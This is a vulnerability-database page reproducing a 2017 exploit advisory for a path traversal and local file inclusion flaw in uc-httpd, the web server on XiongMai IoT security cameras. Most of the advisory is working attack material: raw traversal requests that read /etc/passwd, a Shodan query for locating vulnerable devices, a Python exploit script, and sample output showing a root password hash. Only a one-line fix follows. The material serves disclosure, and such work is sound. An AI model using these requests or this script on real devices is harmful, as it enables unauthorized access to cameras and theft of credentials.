Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

uc-httpd Local File Inclusion / Traversal

🗓️ 31 May 2017 00:00:00Reported by keksecType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 50 Views

uc-httpd Vulnerability, LFI, Directory Traversa

Code
`______ ______ _____ ___ _____ _____ _____  
| ___ \ | ___ \ | _ | |_ | | ___| / __ \ |_ _|  
| |_/ / | |_/ / | | | | | | | |__ | / \/ | |  
| __/ | / | | | | | | | __| | | | |  
| | | |\ \ \ \_/ / /\__/ / | |___ | \__/\ | |  
\_| \_| \_| \___/ \____/ \____/ \____/ \_/  
  
  
_____ _ _ _____ _____ _____ _ _ ______ _____ _____ __ __  
|_ _| | \ | | / ___| | ___| / __ \ | | | | | ___ \ |_ _| |_ _| \ \ / /  
| | | \| | \ `--. | |__ | / \/ | | | | | |_/ / | | | | \ V /  
| | | . ` | `--. \ | __| | | | | | | | / | | | | \ /  
_| |_ | |\ | /\__/ / | |___ | \__/\ | |_| | | |\ \ _| |_ | | | |  
\___/ \_| \_/ \____/ \____/ \____/ \___/ \_| \_| \___/ \_/ \_/  
  
  
[+]---------------------------------------------------------[+]  
| Vulnerable Software: uc-httpd |  
| Vendor: XiongMai Technologies |  
| Vulnerability Type: LFI, Directory Traversal |  
| Date Released: 03/04/2017 |  
| Released by: keksec |  
[+]---------------------------------------------------------[+]  
  
uc-httpd is a HTTP daemon used by a wide array of IoT devices (primarily security cameras) which is vulnerable  
to local file inclusion and directory traversal bugs. There are a few million total vulnerable devices, with  
around one million vulnerable surviellence cameras.  
  
The following request can be made to display the contents of the 'passwd' file:  
GET ../../../../../etc/passwd HTTP/1.0  
  
To display a directory listing, the following request can be made:  
GET ../../../../../var/www/html/ HTTP/1.0  
The above request would output the contents of the webroot directory as if 'ls' command was executed  
  
The following shodan request can be used to display vulnerable systems:  
product:uc-httpd  
  
Here is a proof of concept (written by @sxcurity):  
-------------------------------------------------------------------------------------------------------------  
'''  
#!/usr/bin/env python  
import urllib2, httplib, sys  
  
httplib.HTTPConnection._http_vsn = 10  
httplib.HTTPConnection._http_vsm_str = 'HTTP/1.0'  
  
print "[+] uc-httpd 0day exploiter [+]"  
print "[+] usage: python " + __file__ + " http://<target_ip>"  
  
host = sys.argv[1]  
fd = raw_input('[+] File or Directory: ')  
  
print "Exploiting....."  
print '\n'  
print urllib2.urlopen(host + '/../../../../..' + fd).read()  
  
'''  
-------------------------------------------------------------------------------------------------------------  
  
Here is a live example of the exploit being ran:  
  
  
root@127:~/dongs# python pwn.py http://127.0.0.1  
[+] uc-httpd 0day exploiter [+]  
[+] usage: python pwn.py http://<target_ip>  
[+] File or Directory: /etc/passwd  
Exploiting.....  
  
  
root:absxcfbgXtb3o:0:0:root:/:/bin/sh  
  
root@127:~/dongs# python pwn.py http://127.0.0.1  
[+] uc-httpd 0day exploiter [+]  
[+] usage: python pwn.py http://<target_ip>  
[+] File or Directory: /proc/version  
Exploiting.....  
  
  
Linux version 3.0.8 ([email protected]) (gcc version 4.4.1 (Hisilicon_v100(gcc4.4-290+uclibc_0.9.32.1+eabi+linuxpthread)) ) #52 Fri Apr 22 12:33:57 CST 2016  
  
root@127:~/dongs#  
-------------------------------------------------------------------------------------------------------------  
  
  
How to fix: Sanitize inputs, don't run your httpd as root!  
  
[+]---------------------------------------------------------[+]  
| CONTACT US: |  
| |  
| IRC: irc.insecurity.zone (6667/6697) #insecurity |  
| Twitter: @insecurity |  
| Website: insecurity.zone |  
[+]---------------------------------------------------------[+]  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 May 2017 00:00Current
7.4High risk
Vulners AI Score7.4
uc-httpdvulnerable softwarexiongmai technologieslfidirectory traversal03/04/2017kekseciot devicessecurity camerasvulnerable systemsexploitsanitize inputs
50